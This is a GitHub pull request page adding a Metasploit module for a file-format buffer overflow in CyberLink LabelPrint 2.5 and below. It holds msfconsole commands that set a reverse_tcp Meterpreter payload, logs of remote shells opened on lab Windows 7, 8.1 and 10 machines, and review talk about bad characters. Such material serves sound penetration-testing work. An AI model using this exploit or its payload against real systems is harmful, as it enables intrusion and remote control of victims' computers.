New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) #11040

Merged
merged 4 commits into from Dec 11, 2018

Conversation

Projects
None yet
3 participants
@modpr0be
Contributor

modpr0be commented Nov 29, 2018

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) module based on EDB-42777.

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing overly long string characters via open file menu. This results in overwriting a structured exception handler record and take over the application. This module has been tested on Windows 7x64

Verification

  • Run the downloader/installer (It will download the installer and install the CyberLink Power2Go, LabelPrint, and WaveEditor)
  • Run msfconsole and the exploit module prepare for handler
  • Send the file to the target machine
  • Open CyberLink LabelPrint, go to Open -> Choose the msf.lpp -> shell/calc.

proof image

Generate msf.lpp example and handler output (tested on Windows 7 x64)

[*] Processing labelprint.rc for ERB directives.
resource (labelprint.rc)> use exploits/windows/fileformat/cyberlink_lpp_bof.rb
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /root/.msf4/local/msf.lpp
resource (labelprint.rc)> use exploits/multi/handler
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Started reverse TCP handler on 192.168.240.129:4444 
[*] Sending stage (179779 bytes) to 192.168.240.131
[*] Meterpreter session 1 opened (192.168.240.129:4444 -> 192.168.240.131:49598) at 2018-11-29 08:17:23 -0500

meterpreter >

NOTE: I used a dirty technique to reach the shellcode and it works. For now, it specifically works on Windows 7x64. I managed to make it works on Windows 10 as well, but I need to change some padding characters to reach the shellcode.

If you guys know shortest path, it would be an honor to learn from it.

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

@jrobles-r7 jrobles-r7 self-assigned this Nov 30, 2018

Show resolved Hide resolved modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb Outdated
Show resolved Hide resolved modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb Outdated
'Payload' =>
{
'Space' => 15000,
'BadChars' => "\x00", #badchars starts from 80 until the rest of it.

This comment has been minimized.

@bcoles

bcoles Dec 1, 2018

Contributor

starts from 80 until the rest of it

Does this mean \x80 to \xff , or \x50 to \xff , or something else?

This comment has been minimized.

@modpr0be

modpr0be Dec 2, 2018

Contributor

it's \x80 to \xff

This comment has been minimized.

@bcoles

bcoles Dec 2, 2018

Contributor

Ok, you can do something like this:

Suggested change Beta
'BadChars' => "\x00", #badchars starts from 80 until the rest of it.
'BadChars' => "\x00" + (0x80..0xff).to_a.pack('C*')
2.3.0 :001 > (0x80..0xff).to_a.pack('C*') + "\x00"
 => "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF\x00" 

This comment has been minimized.

@modpr0be

modpr0be Dec 2, 2018

Contributor

Thanks for the suggestion! I'm looking for a replacement like that :+1

This comment has been minimized.

@modpr0be

modpr0be Dec 4, 2018

Contributor

Apparently, if I put all the badchars using your suggested method, it will break how the encoder encode the payload. It will always return [-] Exploit failed: No encoders encoded the buffer successfully. So for testing, I'll stick to 'BadChars' => "\x00",

This comment has been minimized.

@bcoles

bcoles Dec 5, 2018

Contributor

If that's the case, then not all the characters from \x80 to \xff are bad characters. You'll need to identify which characters are bad.

This comment has been minimized.

@modpr0be

modpr0be Dec 5, 2018

Contributor

I already trial error all characters and found that all characters from \x80 to \xff identified as bad characters. The application won't load the crafted .lpp file if the file contains those bad characters.

Show resolved Hide resolved modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb Outdated
@modpr0be

This comment has been minimized.

Contributor

modpr0be commented Dec 3, 2018

I'm still doing some works on Windows 8.1 and Windows 10, see if I can manage to make it simpler.

@modpr0be

This comment has been minimized.

Contributor

modpr0be commented Dec 4, 2018

I'm still doing some works on Windows 8.1 and Windows 10, see if I can manage to make it simpler.

I will merge all suggestions on the next commit. Still trying on Windows 8.1 and Windows 10.

modpr0be and others added some commits Dec 5, 2018

Update cyberlink_lpp_bof.rb
Update includes all suggestions and new targets (Win8.1 x64 and Win10 x64)
@jrobles-r7

This comment has been minimized.

Contributor

jrobles-r7 commented Dec 11, 2018

Tested on Win10 x64 running CyberLink LabelPrint v2.5

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Tested on Win8.1 x64 running CyberLink LabelPrint v2.5

msf5 exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 172.22.222.135
[*] Meterpreter session 14 opened (172.22.222.132:4444 -> 172.22.222.135:49500) at 2018-12-11 07:46:56 -0600

msf5 exploit(multi/handler) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > sysinfo
Computer        : IE11WIN8_1
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >

Tested on Win7 x64 running CyberLink LabelPrint v2.5

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
[*] Sending stage (179779 bytes) to 172.22.222.134
[*] Meterpreter session 2 opened (172.22.222.132:4444 -> 172.22.222.134:49404) at 2018-12-11 07:23:25 -0600

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : IEWIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@jrobles-r7 jrobles-r7 merged commit 106d6ce into rapid7:master Dec 11, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Dec 11, 2018

msjenkins-r7 added a commit that referenced this pull request Dec 11, 2018

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Dec 11, 2018

@jrobles-r7

This comment has been minimized.

Contributor

jrobles-r7 commented Dec 11, 2018

Release Notes

The windows/fileformat/cyberlink_lpp_bof module generates an lpp project file that has a long string within the name element of the TRACK tag. The generated file exploits a buffer overflow vulnerability in CyberLink LabelPrint <= v2.5 when the application attempts to open the lpp project file.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment